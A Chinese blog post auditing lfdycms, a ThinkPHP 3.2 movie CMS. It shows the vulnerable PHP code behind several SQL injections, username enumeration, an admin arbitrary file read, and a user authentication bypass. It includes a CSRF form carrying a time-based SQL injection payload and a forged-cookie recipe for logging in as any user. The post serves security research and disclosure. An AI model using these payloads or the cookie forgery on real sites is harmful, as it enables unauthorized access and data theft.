

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="某人的分享与记录">
  <meta name="author" content="tlmssfs">
  <meta name="keywords" content="技术,生活">
  <title>lfdycms审计 - Tlmssfs&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>tlmssfs</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="lfdycms审计">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-04-16 16:29" pubdate>
        2021年4月16日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.9k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      28
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">lfdycms审计</h1>
            
            <div class="markdown-body">
              <p>前段时间审计的一个CMS，分享一下</p>
<a id="more"></a>

<h1 id="lfdycms简介"><a href="#lfdycms简介" class="headerlink" title="lfdycms简介"></a>lfdycms简介</h1><p>lfdycms是基于thinkphp3.2开发的影视CMS</p>
<h1 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h1><h2 id="前台SQL注入"><a href="#前台SQL注入" class="headerlink" title="前台SQL注入"></a>前台SQL注入</h2><p>thinkphp 3.2的find、select、delete存在SQL注入漏洞</p>
<p>原理：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2629#toc-1">https://xz.aliyun.com/t/2629#toc-1</a></p>
<h3 id="搜索电影注入"><a href="#搜索电影注入" class="headerlink" title="搜索电影注入"></a>搜索电影注入</h3><p>这里使用了存在漏洞的detail方法</p>
<p>Application/Home/Controller/MovieController.class.php</p>
<pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">index</span>(<span class="hljs-params"></span>)</span>&#123;
    $id=I(<span class="hljs-string">&#x27;id&#x27;</span>);
    $info=D(<span class="hljs-string">&quot;Movie&quot;</span>)-&gt;detail($id);
    <span class="hljs-keyword">if</span>(!$info)&#123;
    $error = D(<span class="hljs-string">&quot;Movie&quot;</span>)-&gt;getError();
    <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-keyword">empty</span>($error) ? <span class="hljs-string">&#x27;未找到该影片！&#x27;</span> : $error,U(<span class="hljs-string">&#x27;Home/Index/index&#x27;</span>));
    &#125;
    $info=D(<span class="hljs-string">&quot;Tag&quot;</span>)-&gt;movieChange($info,<span class="hljs-string">&quot;movie&quot;</span>,<span class="hljs-number">1</span>);
    $tpl=D(<span class="hljs-string">&quot;Category&quot;</span>)-&gt;getTpl($info[<span class="hljs-string">&#x27;cid&#x27;</span>],<span class="hljs-string">&#x27;template_detail&#x27;</span>);
    <span class="hljs-keyword">if</span>(!$tpl)&#123;
    $error = D(<span class="hljs-string">&quot;Category&quot;</span>)-&gt;getError();
    <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-keyword">empty</span>($error) ? <span class="hljs-string">&#x27;未知错误！&#x27;</span> : $error);
    &#125;
    Cookie(<span class="hljs-string">&#x27;__forward__&#x27;</span>,$_SERVER[<span class="hljs-string">&#x27;REQUEST_URI&#x27;</span>]);
    D(<span class="hljs-string">&#x27;Movie&#x27;</span>)-&gt;hits($id);
    <span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&#x27;pos&#x27;</span>,<span class="hljs-number">1</span>);
    <span class="hljs-keyword">$this</span>-&gt;assign($info);
    <span class="hljs-keyword">$this</span>-&gt;display(<span class="hljs-string">&quot;.&quot;</span>.<span class="hljs-keyword">$this</span>-&gt;tplpath.<span class="hljs-string">&quot;/&quot;</span>.$tpl);
&#125;</code></pre>

<p>Application/Home/Model/MovieModel.class.php</p>
<pre><code class="hljs php"><span class="hljs-comment">/**</span>
<span class="hljs-comment"> * 获取详情页数据</span>
<span class="hljs-comment"> * <span class="hljs-doctag">@param</span>  integer $id 文档ID</span>
<span class="hljs-comment"> * <span class="hljs-doctag">@return</span> array       详细数据</span>
<span class="hljs-comment"> */</span>
<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">detail</span>(<span class="hljs-params">$id</span>)</span>&#123;
	$info = <span class="hljs-keyword">$this</span>-&gt;field(<span class="hljs-literal">true</span>)-&gt;find($id);
	<span class="hljs-keyword">if</span>(!(is_array($info) || <span class="hljs-number">1</span> !== $info[<span class="hljs-string">&#x27;status&#x27;</span>] || <span class="hljs-number">1</span> !== $info[<span class="hljs-string">&#x27;display&#x27;</span>]))&#123;
		<span class="hljs-keyword">$this</span>-&gt;error = <span class="hljs-string">&#x27;影片被禁用或已删除！&#x27;</span>;
		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;
	&#125;
	<span class="hljs-keyword">return</span> $info;
&#125;</code></pre>

<p>搜索存在漏洞的detail方法，可以看到home模块下有四个可利用的点，查了下CNVD，都被人报上去了，还看到一个Ajaxcontroller.class.php控制器拼接参数的注入</p>
<p><img src="/img/photo/search.png" srcset="/img/loading.gif" alt="搜索结果"></p>
<p>其他几个也是这样，就不写了</p>
<h3 id="随机返回电影注入"><a href="#随机返回电影注入" class="headerlink" title="随机返回电影注入"></a>随机返回电影注入</h3><p>还有拼接参数的</p>
<p>Application/Home/Controller/AjaxController.class.php</p>
<pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">randMovie</span>(<span class="hljs-params"></span>)</span>&#123;
    $data=D(<span class="hljs-string">&#x27;Ajax&#x27;</span>)-&gt;randMovie(I(<span class="hljs-string">&#x27;limit&#x27;</span>),I(<span class="hljs-string">&#x27;category&#x27;</span>));
    <span class="hljs-keyword">$this</span>-&gt;ajaxReturn($data);
&#125;</code></pre>



<p>Application/Home/Model/AjaxModel.class.php</p>
<pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">randMovie</span>(<span class="hljs-params">$limit=<span class="hljs-number">6</span>,$category=<span class="hljs-string">&#x27;&#x27;</span></span>)</span>&#123;
	<span class="hljs-keyword">if</span>($category)&#123;
		$type=<span class="hljs-string">&#x27;and category=&#x27;</span>.$category;
	&#125;
	$prefix=C(<span class="hljs-string">&#x27;DB_PREFIX&#x27;</span>);
	$mlist=M()-&gt;query(<span class="hljs-string">&#x27;SELECT * FROM `&#x27;</span>.$prefix.<span class="hljs-string">&#x27;movie` AS t1 JOIN (SELECT ROUND(RAND() * ((SELECT MAX(id) FROM `&#x27;</span>.$prefix.<span class="hljs-string">&#x27;movie`)-(SELECT MIN(id) FROM `&#x27;</span>.$prefix.<span class="hljs-string">&#x27;movie`))+(SELECT MIN(id) FROM `&#x27;</span>.$prefix.<span class="hljs-string">&#x27;movie`)) AS idx) AS t2 WHERE t1.id &gt;= t2.idx &#x27;</span>.$type.<span class="hljs-string">&#x27; ORDER BY t1.id LIMIT &#x27;</span>.$limit);
	<span class="hljs-keyword">foreach</span>($mlist <span class="hljs-keyword">as</span> $key=&gt;$value)&#123;
		$list[$key]=D(<span class="hljs-string">&#x27;Tag&#x27;</span>)-&gt;movieChange($value,<span class="hljs-string">&#x27;movie&#x27;</span>);
	&#125;
	<span class="hljs-keyword">return</span> $list;
&#125;</code></pre>





<h3 id="普通用户发送信息注入"><a href="#普通用户发送信息注入" class="headerlink" title="普通用户发送信息注入"></a>普通用户发送信息注入</h3><p>必须用GET，这里可以看成前台，因为普通用户可以认证绕过</p>
<p>Application/User/Controller/MessageController.class.php的add方法调用存在漏洞的get_user_name方法</p>
<pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">add</span>(<span class="hljs-params"></span>)</span>&#123;
    <span class="hljs-keyword">if</span>(IS_POST)&#123;
        $rs = D(<span class="hljs-string">&#x27;Message&#x27;</span>)-&gt;send();
        <span class="hljs-keyword">if</span>($rs)&#123;
            <span class="hljs-keyword">$this</span>-&gt;success(<span class="hljs-string">&#x27;信息发送成功！&#x27;</span>);
        &#125; <span class="hljs-keyword">else</span> &#123;
            <span class="hljs-keyword">$this</span>-&gt;error(D(<span class="hljs-string">&#x27;Message&#x27;</span>)-&gt;getError());
        &#125;
    &#125; <span class="hljs-keyword">else</span> &#123;
	<span class="hljs-keyword">if</span>($_GET[<span class="hljs-string">&#x27;uid&#x27;</span>])&#123;
		<span class="hljs-keyword">$this</span>-&gt;username=get_user_name(I(<span class="hljs-string">&#x27;get.uid&#x27;</span>));
		<span class="hljs-keyword">$this</span>-&gt;type=<span class="hljs-number">1</span>;
	&#125;
        <span class="hljs-keyword">$this</span>-&gt;display();
    &#125;
&#125;</code></pre>



<p>Application/Common/Common/function.php的get_user_name方法，这里使用find方法导致产生SQL注入漏洞</p>
<pre><code class="hljs php"><span class="hljs-comment">/**</span>
<span class="hljs-comment"> * 根据用户ID获取用户昵称</span>
<span class="hljs-comment"> * <span class="hljs-doctag">@param</span>  integer $uid 用户ID</span>
<span class="hljs-comment"> * <span class="hljs-doctag">@return</span> string       用户昵称</span>
<span class="hljs-comment"> */</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get_user_name</span>(<span class="hljs-params">$uid = <span class="hljs-number">0</span></span>)</span>&#123;
	$info = M(<span class="hljs-string">&#x27;Users&#x27;</span>)-&gt;field(<span class="hljs-string">&#x27;username&#x27;</span>)-&gt;find($uid);
	<span class="hljs-keyword">if</span>($info !== <span class="hljs-literal">false</span> &amp;&amp; $info[<span class="hljs-string">&#x27;username&#x27;</span>] )&#123;
		$name = $info[<span class="hljs-string">&#x27;username&#x27;</span>];
	&#125; <span class="hljs-keyword">else</span> &#123;
		$name = <span class="hljs-string">&#x27;&#x27;</span>;
	&#125;
    <span class="hljs-keyword">return</span> $name;
&#125;</code></pre>



<h2 id="后台SQL注入"><a href="#后台SQL注入" class="headerlink" title="后台SQL注入"></a>后台SQL注入</h2><h3 id="发送信息注入"><a href="#发送信息注入" class="headerlink" title="发送信息注入"></a>发送信息注入</h3><p>管理员后台发送信息位置存在SQL注入，和普通用户原理是一样的</p>
<h3 id="后台删除影片注入"><a href="#后台删除影片注入" class="headerlink" title="后台删除影片注入"></a>后台删除影片注入</h3><p>Application/Admin/Controller/MovieController.class.php</p>
<pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">delurl</span>(<span class="hljs-params">$pid = <span class="hljs-literal">null</span></span>)</span>&#123;
       <span class="hljs-comment">//删除影片地址</span>
       $res = M(<span class="hljs-string">&#x27;movie_url&#x27;</span>)-&gt;delete($pid);
       <span class="hljs-keyword">if</span>($res !== <span class="hljs-literal">false</span>)&#123;
           <span class="hljs-keyword">$this</span>-&gt;success(<span class="hljs-string">&#x27;删除影片播放地址成功！&#x27;</span>);
       &#125;<span class="hljs-keyword">else</span>&#123;
           <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&#x27;删除影片播放地址失败！&#x27;</span>);
       &#125;
&#125;</code></pre>











<h2 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h2><p>thinkphp有验证令牌的方法autoCheckToken()可以用于防止CSRF，位于ThinkPHP/Library/Think/Model.class.php，管理员后台的用户添加功能就调用了这个方法，因此无法通过CSRF添加用户（不过能添加也不行，这操作太明显了）</p>
<p>发送消息功能并没有CSRF防护，测试SQL注入的POC</p>
<pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span>
  <span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span>
  <span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript">history.pushState(<span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-string">&#x27;/&#x27;</span>)</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
    <span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">action</span>=<span class="hljs-string">&quot;http://lfdycms.tlmssfs.com/admin.php&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">formname</span>&gt;</span>
      <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;hidden&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;s&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;<span class="hljs-symbol">&amp;#47;</span>Message<span class="hljs-symbol">&amp;#47;</span>add<span class="hljs-symbol">&amp;#46;</span>html&quot;</span> /&gt;</span>
      <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;hidden&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;id<span class="hljs-symbol">&amp;#91;</span>alias<span class="hljs-symbol">&amp;#93;</span>&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;where<span class="hljs-symbol">&amp;#32;</span>1<span class="hljs-symbol">&amp;#32;</span>and<span class="hljs-symbol">&amp;#32;</span>sleep<span class="hljs-symbol">&amp;#40;</span>5<span class="hljs-symbol">&amp;#41;</span><span class="hljs-symbol">&amp;#45;</span><span class="hljs-symbol">&amp;#45;</span>&quot;</span> /&gt;</span>
    <span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;text/javascript&quot;</span>&gt;</span><span class="javascript"><span class="hljs-built_in">document</span>.formname.submit()</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
  <span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span></code></pre>



<h2 id="用户遍历"><a href="#用户遍历" class="headerlink" title="用户遍历"></a>用户遍历</h2><p><a target="_blank" rel="noopener" href="http://lfdycms.tlmssfs.com/admin.php?s=/Public/login.html">http://lfdycms.tlmssfs.com/admin.php?s=/Public/login.html</a></p>
<p>管理员登录报错信息会提示用户不存在，如果能识别验证码就能遍历用户，实在不行手测也是可以的</p>
<p>Application/Admin/Controller/PublicController.class.php</p>
<pre><code class="hljs php"><span class="hljs-comment">/**</span>
<span class="hljs-comment">    * 后台用户登录</span>
<span class="hljs-comment">    */</span>
   <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">login</span>(<span class="hljs-params">$username = <span class="hljs-literal">null</span>, $password = <span class="hljs-literal">null</span>, $passcode = <span class="hljs-literal">null</span></span>)</span>&#123;
       <span class="hljs-keyword">if</span>(IS_POST)&#123;
           <span class="hljs-comment">/* 检测验证码 <span class="hljs-doctag">TODO:</span> */</span>
          	<span class="hljs-keyword">if</span>(!check_verify($passcode))&#123;
              	<span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&quot;验证码错误！&quot;</span>);
           &#125;

           $uid = D(<span class="hljs-string">&#x27;Public&#x27;</span>)-&gt;login($username, $password);
           <span class="hljs-keyword">if</span>(<span class="hljs-number">0</span> &lt; $uid)&#123; <span class="hljs-comment">//UC登录成功</span>
               <span class="hljs-keyword">$this</span>-&gt;success(<span class="hljs-string">&#x27;登录成功！&#x27;</span>, U(<span class="hljs-string">&#x27;Index/index&#x27;</span>));
           &#125; <span class="hljs-keyword">else</span> &#123; <span class="hljs-comment">//登录失败</span>
               <span class="hljs-keyword">switch</span>($uid) &#123;
                   <span class="hljs-keyword">case</span> <span class="hljs-number">-1</span>: $error = <span class="hljs-string">&#x27;用户不存在或被禁用！&#x27;</span>; <span class="hljs-keyword">break</span>; <span class="hljs-comment">//系统级别禁用</span>
                   <span class="hljs-keyword">case</span> <span class="hljs-number">-2</span>: $error = <span class="hljs-string">&#x27;密码错误！&#x27;</span>; <span class="hljs-keyword">break</span>;
                   <span class="hljs-keyword">default</span>: $error = <span class="hljs-string">&#x27;未知错误！&#x27;</span>; <span class="hljs-keyword">break</span>; <span class="hljs-comment">// 0-接口参数错误（调试阶段使用）</span>
               &#125;
               <span class="hljs-keyword">$this</span>-&gt;error($error);
           &#125;
       &#125; <span class="hljs-keyword">else</span> &#123;
           <span class="hljs-keyword">if</span>(is_login())&#123;
               <span class="hljs-keyword">$this</span>-&gt;redirect(<span class="hljs-string">&#x27;Index/index&#x27;</span>);
           &#125;<span class="hljs-keyword">else</span>&#123;
               <span class="hljs-comment">/* 读取数据库中的配置 */</span>
			$config =   S(<span class="hljs-string">&#x27;DB_CONFIG_DATA&#x27;</span>);
			<span class="hljs-keyword">if</span>(!$config)&#123;
				$config =  config_lists();
				S(<span class="hljs-string">&#x27;DB_CONFIG_DATA&#x27;</span>,$config);
			&#125;
			C($config); <span class="hljs-comment">//添加配置</span>
               
               <span class="hljs-keyword">$this</span>-&gt;display();
           &#125;
       &#125;
   &#125;</code></pre>





<h2 id="普通用户认证绕过"><a href="#普通用户认证绕过" class="headerlink" title="普通用户认证绕过"></a>普通用户认证绕过</h2><p>认证绕过和审计过的另一个CMS代码基本一样，这还是陈年老认证代码啊。。。</p>
<p>构造cookie就可以登录</p>
<pre><code class="hljs python">lf_users_user_auth_sign=<span class="hljs-number">65</span>ec3b63342f804c7b2b97fbf88cda5550544cd7
lf_users_user_auth=think%<span class="hljs-number">3</span>A%<span class="hljs-number">7</span>B%<span class="hljs-number">22</span>uid%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>A%<span class="hljs-number">2215</span>%<span class="hljs-number">22</span>%<span class="hljs-number">2</span>C%<span class="hljs-number">22</span>username%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>A%<span class="hljs-number">22</span>wdnmd%<span class="hljs-number">22</span>%<span class="hljs-number">7</span>D</code></pre>

<p>构造过程如下</p>
<ol>
<li><p>lf_users_user_auth构造如下格式字符，里面的值只要uid的值存在就可以查到对应用户的其它信息，uid从15开始</p>
<p><strong>think:{“uid”:”15”,”username”:”2222”}</strong></p>
</li>
<li><p>把lf_users_user_auth用http_build_query函数格式化为形如<code>uid=15&amp;username=2222</code>的字符串</p>
</li>
<li><p>对第二步构造的字符串用sha1生成摘要，作为签名 lf_users_user_auth_sign</p>
</li>
</ol>
<p>Application/Common/Common/function.php</p>
<pre><code class="hljs php"><span class="hljs-comment">/**</span>
<span class="hljs-comment"> *检测用户是否登录</span>
<span class="hljs-comment">*<span class="hljs-doctag">@returninteger</span> 0-未登录，大于0-当前登录用户ID</span>
<span class="hljs-comment"> */</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">is_user_login</span>(<span class="hljs-params"></span>)</span>&#123;
    $user = cookie(<span class="hljs-string">&#x27;user_auth&#x27;</span>);
    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">empty</span>($user)) &#123;
        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
    &#125; <span class="hljs-keyword">else</span> &#123;
        <span class="hljs-keyword">return</span> cookie(<span class="hljs-string">&#x27;user_auth_sign&#x27;</span>) == data_auth_sign($user) ? $user[<span class="hljs-string">&#x27;uid&#x27;</span>] : <span class="hljs-number">0</span>;
    &#125;
&#125;

<span class="hljs-comment">/**</span>
<span class="hljs-comment"> * 数据签名认证</span>
<span class="hljs-comment"> * <span class="hljs-doctag">@param</span>  array  $data 被认证的数据</span>
<span class="hljs-comment"> * <span class="hljs-doctag">@return</span> string       签名</span>
<span class="hljs-comment"> */</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">data_auth_sign</span>(<span class="hljs-params">$data</span>) </span>&#123;
    <span class="hljs-comment">//数据类型检测</span>
    <span class="hljs-keyword">if</span>(!is_array($data))&#123;
        $data = (<span class="hljs-keyword">array</span>)$data;
    &#125;
    ksort($data); <span class="hljs-comment">//排序</span>
    $code = http_build_query($data); <span class="hljs-comment">//url编码并生成query字符串</span>
    $sign = sha1($code); <span class="hljs-comment">//生成签名</span>
    <span class="hljs-keyword">return</span> $sign;
&#125;</code></pre>





<h2 id="任意文件读取"><a href="#任意文件读取" class="headerlink" title="任意文件读取"></a>任意文件读取</h2><p>管理后台模板管理处读取任意文件，获取文件路径只是简单的把<code>*</code>换成了<code>/</code>，经测试成功读取数据库配置文件</p>
<p>Application/Admin/Controller/TemplateController.class.php</p>
<pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">edit</span>(<span class="hljs-params">$path = <span class="hljs-literal">null</span></span>)</span>&#123;
......
		$path = realpath(C(<span class="hljs-string">&#x27;TPL_PATH&#x27;</span>).str_replace(<span class="hljs-string">&#x27;*&#x27;</span>,<span class="hljs-string">&#x27;/&#x27;</span>,$_GET[<span class="hljs-string">&#x27;path&#x27;</span>]));
		$content=Storage::read($path);
		$type=substr(strrchr($path, <span class="hljs-string">&#x27;.&#x27;</span>), <span class="hljs-number">1</span>);
		<span class="hljs-keyword">switch</span>($type)&#123; 
		<span class="hljs-keyword">case</span> <span class="hljs-string">&quot;css&quot;</span>:
			$mode=<span class="hljs-string">&quot;css&quot;</span>;
		<span class="hljs-keyword">break</span>;
		<span class="hljs-keyword">case</span> <span class="hljs-string">&quot;js&quot;</span>:
			$mode=<span class="hljs-string">&quot;application/javascript&quot;</span>;
		<span class="hljs-keyword">break</span>;
		<span class="hljs-keyword">default</span>:
			$mode=<span class="hljs-string">&quot;application/x-httpd-php&quot;</span>;
		<span class="hljs-keyword">break</span>;
		&#125;
		<span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&#x27;title&#x27;</span>, basename($path));
		<span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&#x27;path&#x27;</span>, <span class="hljs-keyword">$this</span>-&gt;file_path($path));
		<span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&#x27;mode&#x27;</span>, $mode);
    <span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&#x27;content&#x27;</span>, $content);
    <span class="hljs-keyword">$this</span>-&gt;meta_title = <span class="hljs-string">&#x27;编辑模板&#x27;</span>;
    <span class="hljs-keyword">$this</span>-&gt;display();
......
&#125;</code></pre>

<p>另外还有一点，这里虽然没法编辑，但是提交编辑请求后抓包可以得到文件绝对路径</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><ol>
<li>学到了thinkphp3的一些开发知识，感觉与thinkphp5区别不大，单字母命名的函数不太友好。。</li>
<li>即使是框架的二次开发，也会存在拼接SQL语句的情况，原因不尽相同，有的是没法拼接，有的是不方便或者开发者偷懒。</li>
<li>看到CNVD上有人报RCE，我大概看了下，没找到，改日研究</li>
</ol>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2629">https://xz.aliyun.com/t/2629</a></p>
<p><a target="_blank" rel="noopener" href="https://www.kancloud.cn/manual/thinkphp">https://www.kancloud.cn/manual/thinkphp</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
                    
                  </div>
                
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/11/09/23849/">
                        <span class="hidden-mobile">thinkphp5.1.16-5.1.40反序列化漏洞分析</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div id="vcomments"></div>
  <script type="text/javascript">
    Fluid.utils.waitElementVisible('vcomments', function() {
      Fluid.utils.createScript('https://cdn.staticfile.org/valine/1.4.14/Valine.min.js', function () {
        new Valine({
          el: "#vcomments",
          app_id: "ejQkFhJ6Nt7cCbC0PAV68wlo-gzGzoHsz",
          app_key: "lxiU5GkQyJtyT9IPDsUDE3nh",
          placeholder: "说点什么",
          path: window.location.pathname,
          avatar: "hide",
          meta: ["nick","mail"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: false,
          recordIP: false,
          serverURLs: "",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the
    <a target="_blank" href="https://valine.js.org" rel="nofollow noopener noopener">comments powered by Valine.</a>
  </noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

